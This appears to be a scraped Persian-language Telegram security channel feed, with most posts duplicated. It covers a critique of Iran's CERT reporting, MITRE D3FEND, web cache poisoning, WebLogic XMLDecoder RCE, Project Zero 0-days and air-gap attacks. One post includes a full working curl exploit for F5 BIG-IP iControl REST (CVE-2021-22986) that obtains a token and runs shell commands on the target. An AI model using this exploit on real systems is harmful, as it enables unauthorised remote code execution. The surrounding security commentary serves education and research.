#Maher IR vs #Cyber_Defense US
بد نیست کمی اطلاعات آماری سازمان های متولی بحث امنیت دفاعی رو ببینیم و ببینیم که بازه عملکردی اونها تا کجاس،
قبل از این موضوع، جالبه که بدونید 67 گواهی محصول داخلی در حوزه محصولات امنیت داده شده که در نوع خودش جالبه چرا که نماوای این محصولات بعضا در دسترس نیست و نمیشود ارزیابی کیفی و عمکردی کرد تا نقاط ضعف و قوت آنها را شناخت،
اما در خصوص عملکرد مرکز ماهر هم اطلاعاتی به چشم میخوره که بازه عملکردی رو میتونید مشاهده کنید آیا مرکز ماهر در خصوص 303873 هزار نقطه آلوده، IOCs هایی هم منتشر کرده؟ تا در رویکرد های تکنیکی #CTI هم بشود از آنها استفاده کرد؟
یا در خصوص حملات سطح پیشرفته یعنی #APT چه TTPs هایی رو منتشر داشته این مرکز؟ همونطور که میدونید بزرگترین دغدغه های حملات سایبری حملات پیشرفته میباشد نه صرفا بات و RAT و دیگر موارد سطح معمول
آیا ما در خصوص شکار حملات سایبری سطح کشوری که بعضا کشورهای دیگر گزارشات Forensic و مفصلی رو منتشر میکنند ما هم اینگونه گزارشات رو از شرکت های داخلی یا مراکز حاکمیتی میبینیم؟
امیدوارم رویکردهای سایبری کشور بروز شود.
@Unk9vvN
بد نیست کمی اطلاعات آماری سازمان های متولی بحث امنیت دفاعی رو ببینیم و ببینیم که بازه عملکردی اونها تا کجاس،
قبل از این موضوع، جالبه که بدونید 67 گواهی محصول داخلی در حوزه محصولات امنیت داده شده که در نوع خودش جالبه چرا که نماوای این محصولات بعضا در دسترس نیست و نمیشود ارزیابی کیفی و عمکردی کرد تا نقاط ضعف و قوت آنها را شناخت،
اما در خصوص عملکرد مرکز ماهر هم اطلاعاتی به چشم میخوره که بازه عملکردی رو میتونید مشاهده کنید آیا مرکز ماهر در خصوص 303873 هزار نقطه آلوده، IOCs هایی هم منتشر کرده؟ تا در رویکرد های تکنیکی #CTI هم بشود از آنها استفاده کرد؟
یا در خصوص حملات سطح پیشرفته یعنی #APT چه TTPs هایی رو منتشر داشته این مرکز؟ همونطور که میدونید بزرگترین دغدغه های حملات سایبری حملات پیشرفته میباشد نه صرفا بات و RAT و دیگر موارد سطح معمول
آیا ما در خصوص شکار حملات سایبری سطح کشوری که بعضا کشورهای دیگر گزارشات Forensic و مفصلی رو منتشر میکنند ما هم اینگونه گزارشات رو از شرکت های داخلی یا مراکز حاکمیتی میبینیم؟
امیدوارم رویکردهای سایبری کشور بروز شود.
@Unk9vvN
#MITRE #D3FEND
همواره شاهد ماتریس تکنیک های تهاجمی بودیم که MITRE ATT&CK زحمت مستندسازیش رو بر دوش داشت و انجام میداد،
اما جدیدا یک ماتریس هم در خصوص تکنیک های تدافعی release شده که در تقابل سطوح مختلف مقاوم سازی و رهگیری و شناسایی، روش های موجود رو معرفی و ترسیم میکنه.
همانطور که میبینید بسیاری از فرایندهای کنترلی و رهگیری بصورت تکنیکی تعریف شده و میشود انجام داد، اما متاسفانه در کشور ما بجای خدمات دانش بنیان به معنی واقعی کلمه، شرکت ها ترجیح میدهند با محصولات خارجی همین فرایندهارو پیاده سازی کنند.
https://d3fend.mitre.org
@Unk9vvN
همواره شاهد ماتریس تکنیک های تهاجمی بودیم که MITRE ATT&CK زحمت مستندسازیش رو بر دوش داشت و انجام میداد،
اما جدیدا یک ماتریس هم در خصوص تکنیک های تدافعی release شده که در تقابل سطوح مختلف مقاوم سازی و رهگیری و شناسایی، روش های موجود رو معرفی و ترسیم میکنه.
همانطور که میبینید بسیاری از فرایندهای کنترلی و رهگیری بصورت تکنیکی تعریف شده و میشود انجام داد، اما متاسفانه در کشور ما بجای خدمات دانش بنیان به معنی واقعی کلمه، شرکت ها ترجیح میدهند با محصولات خارجی همین فرایندهارو پیاده سازی کنند.
https://d3fend.mitre.org
@Unk9vvN
#Cache_Poisoning #Cache_Deception #Cross_Site_Scripting #Host_Header_Injection
در این مطلب قصد داریم، یکی از حملات سایبری بر بستر وب، به نام Cache Poisoning، را شرح دهیم. اول، کمی با Cache و انواع آن آشنا خواهیم شد. دوم، به سراغ مفهوم پایه ای این آسیب پذیری و چگونگی شناسایی آن می رویم. سوم، عواقب آن را مرور می کنیم. چهارم، مکانیزم های دفاع در برابر این آسیب پذیری (Mitigations) و پنجم راه های دور زدن این مکانیزم ها را بررسی می کنیم.
در مورد Cache و انواع آن
به طور کلی حافظه نهان (Cache) در سطوح مختلف دنیای کامپیوتر مورد استفاده قرار می گیرد.…
⚠️ ادامه مطلب در لینک زیر
unk9vvn.com/2021/07/web-cache-poisoning/
@Unk9vvN
در این مطلب قصد داریم، یکی از حملات سایبری بر بستر وب، به نام Cache Poisoning، را شرح دهیم. اول، کمی با Cache و انواع آن آشنا خواهیم شد. دوم، به سراغ مفهوم پایه ای این آسیب پذیری و چگونگی شناسایی آن می رویم. سوم، عواقب آن را مرور می کنیم. چهارم، مکانیزم های دفاع در برابر این آسیب پذیری (Mitigations) و پنجم راه های دور زدن این مکانیزم ها را بررسی می کنیم.
در مورد Cache و انواع آن
به طور کلی حافظه نهان (Cache) در سطوح مختلف دنیای کامپیوتر مورد استفاده قرار می گیرد.…
⚠️ ادامه مطلب در لینک زیر
unk9vvn.com/2021/07/web-cache-poisoning/
@Unk9vvN
#Unauthenticated #Weblogic #RCE
چندین ساله که سرویس های Weblogic در پلتفرم های مختلف منجر به حملات RCE میشه که حاصل آسیب پذیری های مختلفی هستند، از این روی کشف آسیب پذیری بصورت WhiteBox در این سرویس ها بسیار موضوعیت داشته و هر ساله یک یا دو مورد آسیب پذیری سطح Critical عمومی میشود،
در تصویر پست بواسطه یک Request با روش POST به Endpoint مربوطه در سرویس Weblogic زده شده که نشون میده هکر مستقیما با استفاده از کلاس java.beans.XMLDecoder توانسته یک Initialize برای رسیدن به ProcessBuilder پیاده سازی کرده و با یک html encoding دستور ورودی به اکسپلویت رو در command_filtered قرار داده و بصورت void روش start رو فراخوانی کرده و RCE اتفاق می افته به همین راحتی،
دوستان از بحث Weblogic Pentest غافل نباشید چرا که بستر خوبی برای کشف bug برای bug bounty خواهد بود...
https://github.com/c0mmand3rOpSec/CVE-2017-10271
https://github.com/ZO1RO/CVE-2019-2890
@Unk9vvN
چندین ساله که سرویس های Weblogic در پلتفرم های مختلف منجر به حملات RCE میشه که حاصل آسیب پذیری های مختلفی هستند، از این روی کشف آسیب پذیری بصورت WhiteBox در این سرویس ها بسیار موضوعیت داشته و هر ساله یک یا دو مورد آسیب پذیری سطح Critical عمومی میشود،
در تصویر پست بواسطه یک Request با روش POST به Endpoint مربوطه در سرویس Weblogic زده شده که نشون میده هکر مستقیما با استفاده از کلاس java.beans.XMLDecoder توانسته یک Initialize برای رسیدن به ProcessBuilder پیاده سازی کرده و با یک html encoding دستور ورودی به اکسپلویت رو در command_filtered قرار داده و بصورت void روش start رو فراخوانی کرده و RCE اتفاق می افته به همین راحتی،
دوستان از بحث Weblogic Pentest غافل نباشید چرا که بستر خوبی برای کشف bug برای bug bounty خواهد بود...
https://github.com/c0mmand3rOpSec/CVE-2017-10271
https://github.com/ZO1RO/CVE-2019-2890
@Unk9vvN
#F5_iControl #REST Unauthenticated RCE (#SSRF) #CVE_2021_22986
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
@Unk9vvN
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
token=`curl -i -k -s -X $'POST' -H "Host: $TARGET" -H $'Accept-Language: en' -H $'Authorization: Basic YWRtaW46' -H $'Content-Type: application/json' -H $'Content-Length: 109' -H $'Connection: close' -b $'BIGIPAuthCookie=1234' --data-binary $'{\"username\":\"admin\",\x0d\x0a\"userReference\":{},\x0d\x0a\"loginReference\":{\"link\":\"http://$TARGET/mgmt/shared/gossip\"}\x0d\x0a}' "http://$TARGET/mgmt/shared/authn/login" | grep "{" | jq .token.token| sed 's/"//g'`;echo $token;curl -s -H "X-F5-Auth-Token: $token" -H "Content-Type: application/json" "http://$TARGET/mgmt/tm/util/bash" -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .commandResult
https://support.f5.com/csp/article/K03009991@Unk9vvN
Unk9vvN
#Maher IR vs #Cyber_Defense US بد نیست کمی اطلاعات آماری سازمان های متولی بحث امنیت دفاعی رو ببینیم و ببینیم که بازه عملکردی اونها تا کجاس، قبل از این موضوع، جالبه که بدونید 67 گواهی محصول داخلی در حوزه محصولات امنیت داده شده که در نوع خودش جالبه چرا که نماوای…
#Maher IR vs #Cyber_Defense US
پیرو پست قبلی که انتقاداتی به نحوه عملکرد مرکز ماهر بصورت علمی وارد کردیم، اینبار یک نمونه از گزارشات مرکز دفاع سایبری آمریکا رو براتون تشریح میکنیم که ایرادات وارده مستند بشه،
خب در تصور شماره یک میبینید که اول اعلام میکنه مراکز مورد حمله کجا بوده و TTPs یا Tactic, Technique, Procedure براش ناشناس بوده و خب نکاتی رو هم اعلام میکنه...، در تصویر دوم بعد از گزارش جرم شناسی که انجام شده اعلام میکنه که مراحل حمله از پلن اول تا پلن انتهایی چطور بوده و خب میبینید که در تمامی پلن ها عدد Technique رو طبق مستندات MITRE ATT&CK تشریح کرده
در تصویر سوم هم باقی پلن های TTPs رو تشریح کرده که اگر دقت بکنید دقیقا گفته شده که حمله در مراحل مختلف چه تکنیک هایی رو پیاده کرده است، اما نکته خیلی جالب داستان اینجاس که در تصویر چهارم برای رهگیری و Mitigation این حملات اعلام کرده که شاخصه های حمله یا IOCs ها در دسترس عموم قرار گرفته شده که تیم های SOC بخش های دیگه کشور میتونن باهاش حمله رو اگر به اونها خواست اتفاق بی افته رهگیری کنند.
REF
@Unk9vvN
پیرو پست قبلی که انتقاداتی به نحوه عملکرد مرکز ماهر بصورت علمی وارد کردیم، اینبار یک نمونه از گزارشات مرکز دفاع سایبری آمریکا رو براتون تشریح میکنیم که ایرادات وارده مستند بشه،
خب در تصور شماره یک میبینید که اول اعلام میکنه مراکز مورد حمله کجا بوده و TTPs یا Tactic, Technique, Procedure براش ناشناس بوده و خب نکاتی رو هم اعلام میکنه...، در تصویر دوم بعد از گزارش جرم شناسی که انجام شده اعلام میکنه که مراحل حمله از پلن اول تا پلن انتهایی چطور بوده و خب میبینید که در تمامی پلن ها عدد Technique رو طبق مستندات MITRE ATT&CK تشریح کرده
در تصویر سوم هم باقی پلن های TTPs رو تشریح کرده که اگر دقت بکنید دقیقا گفته شده که حمله در مراحل مختلف چه تکنیک هایی رو پیاده کرده است، اما نکته خیلی جالب داستان اینجاس که در تصویر چهارم برای رهگیری و Mitigation این حملات اعلام کرده که شاخصه های حمله یا IOCs ها در دسترس عموم قرار گرفته شده که تیم های SOC بخش های دیگه کشور میتونن باهاش حمله رو اگر به اونها خواست اتفاق بی افته رهگیری کنند.
REF
@Unk9vvN
#Zero_Day Exploit #Publishing
یکی از عجایبی که امشب از برخی عزیزان مسئول که در محیط ClubHouse بودن شنیدیم این بود که هیچ یک از آسیب پذیری های روز صفر در دنیا عمومی نمیشود و از اونجا که صحبت های خودمون رو همواره مستند میکنیم یکسری از آسیب پذیری های روز صفری که تیم تحقیقاتی projectzero شرکت گوگل برای همین سالها منتشر کرده رو اینجا رفرنس میکنیم.
https://googleprojectzero.github.io/0days-in-the-wild/rca.html
@Unk9vvN
یکی از عجایبی که امشب از برخی عزیزان مسئول که در محیط ClubHouse بودن شنیدیم این بود که هیچ یک از آسیب پذیری های روز صفر در دنیا عمومی نمیشود و از اونجا که صحبت های خودمون رو همواره مستند میکنیم یکسری از آسیب پذیری های روز صفری که تیم تحقیقاتی projectzero شرکت گوگل برای همین سالها منتشر کرده رو اینجا رفرنس میکنیم.
https://googleprojectzero.github.io/0days-in-the-wild/rca.html
@Unk9vvN
#AirGap #Jumpers
امشب اطلاعاتی هم در خصوص انواع حملات شبکه های Air-Gap داده شد در جلسات هفتگی کلاب هاوس و اشاره شد به تحقیقاتی که یک دانشگاه اسرائيلی انجام داده و نشون داده که حملات به این شبکه بسیار متنوع میتواند باشد،
منطقی که محقق در روش های خودش بصورت مشترک ازش بهره میگیره اینه که هر عامل میدانی که بتواند دو بعد مثبت و منفی ای داشته باشد چه در نوسانات الکتریکی چه در دسیبل رادیویی چه در نور و موارد دیگه، پتانسیل دریافت و شنود اطلاعات را از آن خواهد بود،
همونطور که در یکی از تصاویر میبینید به پتانسیل هایی مانند Thermal - Optical - Electric - Acoustic - Electromagnetic - Magnetic و Physical Media اشاره شده که در جلسه امشب کلاب هاوس در خصوص برخی از آنها توضیحات مختصری داده شد.
https://i.blackhat.com/us-18/Wed-August-8/us-18-Guri-AirGap.pdf
@Unk9vvN
امشب اطلاعاتی هم در خصوص انواع حملات شبکه های Air-Gap داده شد در جلسات هفتگی کلاب هاوس و اشاره شد به تحقیقاتی که یک دانشگاه اسرائيلی انجام داده و نشون داده که حملات به این شبکه بسیار متنوع میتواند باشد،
منطقی که محقق در روش های خودش بصورت مشترک ازش بهره میگیره اینه که هر عامل میدانی که بتواند دو بعد مثبت و منفی ای داشته باشد چه در نوسانات الکتریکی چه در دسیبل رادیویی چه در نور و موارد دیگه، پتانسیل دریافت و شنود اطلاعات را از آن خواهد بود،
همونطور که در یکی از تصاویر میبینید به پتانسیل هایی مانند Thermal - Optical - Electric - Acoustic - Electromagnetic - Magnetic و Physical Media اشاره شده که در جلسه امشب کلاب هاوس در خصوص برخی از آنها توضیحات مختصری داده شد.
https://i.blackhat.com/us-18/Wed-August-8/us-18-Guri-AirGap.pdf
@Unk9vvN
#Cyber_Security Organizational Structure
شاید برای شما هم جالب باشه که بدونید فضای سایبر سه بُعد کلی دارد، یک امنیت فضای سایبر دوم خدمات IT و ICT و سوم ماهیت حقوقی فضای سایبر.
اولین بُعد که امنیت سایبر هست دو قسمت کلی دارد امنیت تهاجمی و امنیت تدافعی. امنیت فضای سایبر، حاکمیت ها سیاست گذاری و عملیات های تهاجمی را سازمان دهی میکنند و شرکت های خصوصی بُعد دفاعی را برعهده دارند مانند FireEye و CrowdStrike و Microsoft تامین میکنند.
دومین بُعد خدمات فضای سایبر است که در هر لایه خدمات شرکت ها به مردم تعریف میشود، موضوعاتی همچون رسانه - مالی - اجتماعی - تحصیلی و غیره. همچنین حاکمیت سیاست گذاری و تامین زیرساخت میکند و شرکت های دانش بنیان نیازمندی های خدمات دهی نرم افزاری را تامین میکنند مانند Twitter و Instagram و Blockchain
سومین بُعد ماهیت حقوقی فضای سایبر است که در این سطح خدمات قضایی و اجتماعی، مدیریت و تعریف میشود، مثال رسیدگی به کلاه برداری ها- هک های غیر مجاز و غیره. حاکمیت سیاست گذاری میکند و بواسطه مراجعه قضایی نیازمندی های مردم را رفع رجوع میکند بواسطه دستگاه هایی مانند پلیس فتا.
nsainfo.ir
@Unk9vvN
شاید برای شما هم جالب باشه که بدونید فضای سایبر سه بُعد کلی دارد، یک امنیت فضای سایبر دوم خدمات IT و ICT و سوم ماهیت حقوقی فضای سایبر.
اولین بُعد که امنیت سایبر هست دو قسمت کلی دارد امنیت تهاجمی و امنیت تدافعی. امنیت فضای سایبر، حاکمیت ها سیاست گذاری و عملیات های تهاجمی را سازمان دهی میکنند و شرکت های خصوصی بُعد دفاعی را برعهده دارند مانند FireEye و CrowdStrike و Microsoft تامین میکنند.
دومین بُعد خدمات فضای سایبر است که در هر لایه خدمات شرکت ها به مردم تعریف میشود، موضوعاتی همچون رسانه - مالی - اجتماعی - تحصیلی و غیره. همچنین حاکمیت سیاست گذاری و تامین زیرساخت میکند و شرکت های دانش بنیان نیازمندی های خدمات دهی نرم افزاری را تامین میکنند مانند Twitter و Instagram و Blockchain
سومین بُعد ماهیت حقوقی فضای سایبر است که در این سطح خدمات قضایی و اجتماعی، مدیریت و تعریف میشود، مثال رسیدگی به کلاه برداری ها- هک های غیر مجاز و غیره. حاکمیت سیاست گذاری میکند و بواسطه مراجعه قضایی نیازمندی های مردم را رفع رجوع میکند بواسطه دستگاه هایی مانند پلیس فتا.
nsainfo.ir
@Unk9vvN